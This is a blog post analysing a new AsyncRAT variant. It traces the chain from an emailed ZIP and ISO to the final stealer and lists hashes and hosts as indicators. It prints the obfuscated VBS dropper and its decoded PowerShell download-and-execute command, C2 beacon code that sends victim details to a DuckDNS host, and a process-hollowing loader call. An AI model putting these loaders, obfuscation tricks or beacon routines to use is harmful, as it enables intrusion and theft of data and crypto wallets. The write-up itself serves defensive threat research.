home blog ctf pentesting github

๐Ÿ‘ฝNew AsyncRAT Variation Malware Analysis

References:

Artifacts can be found here: https://git.landon.pw/r/malware-analysis/tree/main/async-rat

Background

During an incident investigation, we uncovered a new variation of the AsyncRAT threat campaign. This follows closely with MorphieSecโ€™s analysis, but there are some differences to be noted.

Original Email Link: hxxp://webmail.spectrum.net/index.php/mail/viewmessage/getattachment/uniqueId/137694/account/0/filenameOriginal/ZXNHUCET67WGFYUH23HJ32F32.zip/filenameModified/ZXNHUCET67WGFYUH23HJ32F32.zip?folder=SU5CT1g%253D

The email link downloads zxnhucet67wgfyuh23hj32f32.zip. It is a ZIP archive containing an ISO disk image with the same name as the zip: ZXNHUCET67WGFYUH23HJ32F32.iso. Once mounted, the disk image contains PZKFEUUD76631.vbs.

Dropper Analysis

The malware starts at the PZKFEUUD76631.vbs. The VBS script employs basic obfuscation to call PowerShell, which downloads the contents of hxxp://hennhaus.com/wp-includes/images/wlw/pomo/wo/xx.txt and executes it.

GFEIIPQN = ("t.S")
RZJIXQMY = ("p"+GFEIIPQN+"h")
QGKTYAJN = ("ri"+RZJIXQMY+"el")
YQKXLMIK = ("Sc")
Set JLVWAYWB = CreateObject("W"+YQKXLMIK+QGKTYAJN+"l")
WQRUDORK = "m"
YKPMWRKW = "po"
ZSNVRCYD = "el"
IPHJRZXC = "sh"
XTDPCXDY = "l -Co"
TLSQCTOM = "wer"
EWCOIBQW = "man"
SYFBMBZE = "d [void] [System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.Visua"
RBHSUTBB = "lBasic.Interaction]::CallByname((New-Object Net.WebClient),'Dow__lo--tri__g'.replace('__','n').replace('--','adS'),[Microsoft.VisualBasic.CallType]::Method,"
YCAFQCOE = "'__#$_____!___'.Replace('__#$__','http://hennhaus.co').Replace('___!___','m/wp-includes/images/wlw/pomo/wo/xx.txt'))|IE"
BMUYOXSY = "X;[Byte[]]"
JLVWAYWB.Run YKPMWRKW+TLSQCTOM+IPHJRZXC+ZSNVRCYD+XTDPCXDY+WQRUDORK+EWCOIBQW+SYFBMBZE+RBHSUTBB+YCAFQCOE+BMUYOXSY,0

# Deobfuscated
Set JLVWAYWB = CreateObject("Wscript.Shell")
JLVWAYWB.Run powershell -Command [void] [System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'hxxp://hennhaus.com/wp-includes/images/wlw/pomo/wo/xx.txt')|IEX;[Byte[]], 0

The script downloaded creates persistence. It creates a few files:

  • img.ps1 (From hxxp://hennhaus.com/wp-includes/images/wlw/pomo/wo/1.txt)

  • xx.bat - Creates scheduled task to run img.vbs

  • img.vbs - Runs img.bat

  • img.bat - Executes the img.ps1 PowerShell

  • xx.vbs - Runs xx.bat

All of these files are stored in the C:\ProgramData\img\ISO directory.

So all-in-all, the action flow is as follows: zip -> iso -> vbs -> xx.vbs -> xx.bat -> img.vbs -> img.bat -> img.ps1

img.ps1 does a couple of things to initiate the malicious payload. It first declares a few variables:

[String] $IP = 'mo1010.duckdns.org'
[String] $Port = '4000'
[String] $Splitter = 'qiQqi'
[String] $sleepSec = 5

Then, it grabs the HWID and AV product of the machine.

$NT,$hwid,$AV
...

try {
    $hwid = $Fs.GetDrive($pwd.drive.name).SerialNumber
    $hwid = "{0:X}" -f $hwid
}
catch {
    $hwid = 'Error'
}
try {
    $AV = (Get-WmiObject -Namespace 'root/SecurityCenter2' -Class 'AntiVirusProduct').displayname;
    if ($AV -eq $null) {
        $AV = 'NAN/AV'
    }
}
catch {
    $AV = 'NAN/AV'
}

Next, it sends information about the machine to the mo1010.duckdns.org:4000 web server. It packs all of the information: HWID, AV, OS, computer name, and username, and passes it as a User-Agent in the request header.

Function HTTP($DA, $Param) {
    [String] $Response = [String]::Empty
    try
    {
        $httpobj.Open('POST', 'http://' + $IP + ':' + $Port + '/' + $DA, $false)
        $httpobj.SetRequestHeader('User-Agent:', $hwid + $Splitter+ $NT + $Splitter + ($env:COMPUTERNAME) + $Splitter + ($env:UserName) + $Splitter + (Get-WmiObject Win32_OperatingSystem).Caption + $Splitter + $Splitter + "0.1" + $Splitter + $AV + $Splitter + "Powershell" + $Splitter)
        $httpobj.Send($Param)
        $Response = [Convert]::ToString($httpobj.ResponseText)
    } catch { }
    return $Response
}
while($true)
{
    $A = [Microsoft.VisualBasic.Strings]::Split((HTTP("ready", "")) , $Splitter)
...

Dependent on the response of the request, thereโ€™s twelve commands the PowerShell can run. The script splits the response and uses the first element in the array as the command.

switch($A[0]) {
    'close' {
        ...
    }
    'UNS' {
        ...
    }
    'DW' {
        ...
    }
    'exc' {
        ...
    }
    'memory' {
        ...
    }

    'bot' {
        ...
    }

    'PE' {
        ...
    }

    'vurl' {
        ...
    }

    'hurl' {
        ...
    }

    'shellfuc' {
        ...
    }

    'Note' {
        ...
    }
}

Here are the commands and what they do:

  • โ€˜closeโ€™: Stops the script

  • โ€˜restartโ€™: Stops the script and re-opens it

  • โ€˜UNSโ€™: Stops the script and deletes it (uninstall)

  • โ€˜DWโ€™: Writes bytes to a file in the temp folder

  • โ€™excโ€™: Downloads file to the temp folder

  • โ€˜memoryโ€™: Loads an assembly into the application domain

  • โ€˜botโ€™: Invokes the BotKiller class from reflected PE

  • โ€˜PEโ€™: Invokes the SendtoMemory class from reflected PE

  • โ€˜vurlโ€™: Runs the second argument of the response

  • โ€˜hurlโ€™: Navigates to a website via Internet Explorer in an invisible window

  • โ€˜shellfucโ€™: Similar to vurl, except with a hidden window

  • โ€˜Noteโ€™: Writes to registry key HKEY_CURRENT_USER\SOFTWARE\<hwid>\Note

These are guesses on the usage, as there is no way to be sure without seeing the request response. Either the โ€˜DWโ€™ or โ€™excโ€™ command cause the final stage of the malware to be dropped on the machine. It downloads 1.ps1 to %appdata%\Local\Temp.

Payload Analysis

1.ps1 contains two helper functions, Binary2String and HexaToByte. These functions are used to decode two strings, $serv and $DATA:

[byte[]]$RF5X = HexaToByte($serv)
[byte[]]$TyXC3 = HexaToByte($DATA)
[byte[]]$RF5X = HexaToByte($serv)
[byte[]]$TyXC3 = HexaToByte($DATA)
   } catch { }
    try
    {
$Y4X = "LZXXZ".Replace("ZXXZ","oad")
$IO5D = $Y4X
$get = "GeLZXXZ".Replace("LZXXZ","tMethod")
$UVJZ2 = $get
$MXU4 = (Binary2String("01000101011110000110010101100011011101010111010001100101"))
$WTXY6 = (Binary2String("010010010110111001110110011011110110101101100101"))
$OLFW = 'C___!___:\Windo___!___ws\Micros___!___oft.NEt\F___!___ramework\___!___v4.0.30319___!___\asp___!___net_com___!___piler.e___!___xe'
$MXU4 = (Binary2String("01000101011110000110010101100011011101010111010001100101"))
$WTXY6 = (Binary2String("010010010110111001110110011011110110101101100101"))
$OLFW = 'C___!___:\Windo___!___ws\Micros___!___oft.NEt\F___!___ramework\___!___v4.0.30319___!___\asp___!___net_com___!___piler.e___!___xe'
[Reflection.Assembly]::$IO5D($TyXC3).'Gettype'('GIT.local').$UVJZ2($MXU4).$WTXY6($null,($OLFW.Replace("___!___",""),$RF5X))

# Deobfuscated
# Loads `runpe.dll` PE, and then invokes `Stub.exe` in the process.
#[Reflection.Assembly]::Load($TyXC3).'Gettype'('GIT.local').'GetMethod'('Execute').'Invoke'($null, ('C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe', $RF5X))

 try
    {
$XR0 = "Fra-!-!*!*-".Replace("-!-!*!*-","mework64")
}
catch { }
 try
    {
$SEWYSU = "Fra-!-!*!*-".Replace("-!-!*!*-","mework")
}
catch { }
$SEWYSU + $XR0
} catch { }

I wrote a small Python script to convert the bytes into a file, and ran file RF5X and file TyXC3 to determine the file types of the payloads.

file TyXC3; file RF5X
TyXC3: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
RF5X: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows

I began some basic PE analysis of the two files. I used XPEViewer to look at the version info (specifically, the StringFileInfo.OriginalFilename) and found that $RF5X is Stub.exe and TyXC3 is runpe.dll. Further analysis of the runpe.dll shows it is packed with ConfuserEx-- an open source PE obfuscator and packer. runpe.dll uses the RunPE process hollowing technique to start an aspnet_compiler.exe process and inject the payload (Stub.exe) in it.

Manalyzer catches some interesting behavior about Stub.exe. There are checks for VMWare and Sandboxie present. Some other references that are interesting that Manalyzer missed that I discovered through static analysis:

  • System.Collections.IEnumerable.GetEnumerator - Possibly to enumerate all files (ie: ransomware capabilities)

  • Google Chrome โ€˜MetaMaskโ€™ extension

  • Exodus Wallet exodus.conf.json

  • Bitcoin settings.json

  • Atomic cookies

  • Bitcoin Core

  • VirtualBox check

  • AES, MD5 CryptoServiceProvider

  • Task Scheduler

  • Select * from AntivirusProduct

  • AnyDesk

  • Offkeylogger

  • asynclogs.txt

  • โ€œmasterKeyโ€

  • sendPlugin, savePlugin

From just looking at the strings, there is a pretty clear idea on what this malware does. There are a few references to crypto wallets: Exodus, MetaMask, and Atomic, and their relevant configuration filesโ€“ so probably a crypto stealer feature. There is also a reference to โ€œAnyDeskโ€ and โ€œOffkeyloggerโ€, so remote viewing is probably provided by AnyDesk and the ability to log keystrokes. There are also multiple references to cryptography: AES and MD5 CryptoServiceProvider as well as a โ€œmaster keyโ€. This indicates a high likelihood that the malware has ransomware capabilities.

Further, there is also reference to scheduled task via /c schtasks /create /f /sc onlogon /rl highest /tn " which references the registry location: Software\Microsoft\Windows\CurrentVersion\Run. This is to create persistence and run the malware at login.

Dynamic testing of the malware confirms these suspicions. When ran, multiple Dialog boxes opened, and the threat actor asked โ€œWhat are you working onโ€ as well as โ€œAre you from Paris or London?โ€. Eventually, they prompted me to add them on Telegram or ICQ, which I added them on Telegram. They operate under the handle @BusinessIsLife. After a while of talking on Telegram, the threat actor began to delete and rename files on the VM. It was actually a pretty cool experience to communicate with the threat actor during the analysis.

Nevertheless, the dynamic testing proved the malwareโ€™s ability to interact with the host, proving itโ€™s capabilities as a RAT. Based on the testing and information available at this time, it seems the malware is a variant of the AsyncRAT family, with the ability to steal crypto wallets. Another possible related malware is the njRAT LIME variant. During investigation on runpe.dll, I discovered a YouTube video: โ€œRunPe Dll In C# By neutronโ€ and at 4:23, there are references to njRAT.exe and Stub.manifest, which could possibly link to Stub.exe.

Thatโ€™s all for the analysis of this malware. Thanks for reading, and I hope the information provided was clear and succinct, yet informative. Feel free to connect with me on my socials, I plan to continue the malware analysis and will post updates there:

LinkedIn: https://linkedin.com/in/landoncrabtree

Artifacts / IoC

filename
SHA-256 hash

zxnhucet67wgfyuh23hj32f32.zip
4f61c43d13ed7a1fb3ce88f468ac3d3616835b15bba423844d4fa567e4eb3789

ZXNHUCET67WGFYUH23HJ32F32.iso
9adffa4a4112fac8e10e2a2902cfd69d397ad32dd8d551e222a23461091b95ff

PZKFEUUD76631.vbs
56b18ab332e0cc57d093588a94a0c005e4cc3c9e46a85e508156ef97f49ea950

xx.bat
5a0e5c556ccce109ecce3678f0fbf58ef7443908a60885836290ce3030e16224

xx.vbs
aced1a2634565371ed59da082d806be6f413dae012ad182406c31a3a48853397

img.bat
b8c13e23f710819e5d2485808f916c7ea4853917d3a7b765c25708cc461d00e1

img.vbs
80924e8ae8dc6f2302247d9efa5b39cf32fa9115b31f335421df56f8fbba40c3

img.ps1
0bca0664c345bc64e80df1d31d197f37f041979d4aaf7d163258f56d5fc98f05

1.ps1
e19478a0b6f04da540dab607f3f31c12784ba6ce373cebb7e5b2826827b1144f

runpe.dll
4961eee1ea6e916f0ac4383b7c4ccbd53ee696c651fec983b8361dd87b0cc4e7

Stub.exe
844584b3cde84d6ebfcb4e9f0bdd31fea4f37021727b771712674ea22e14dc46

hennhaus.com
198.54.116.144

mo1010.duckdns.org
194.26.192.82
PreviousLandon's Declassified Internship Survival Guide

Last updated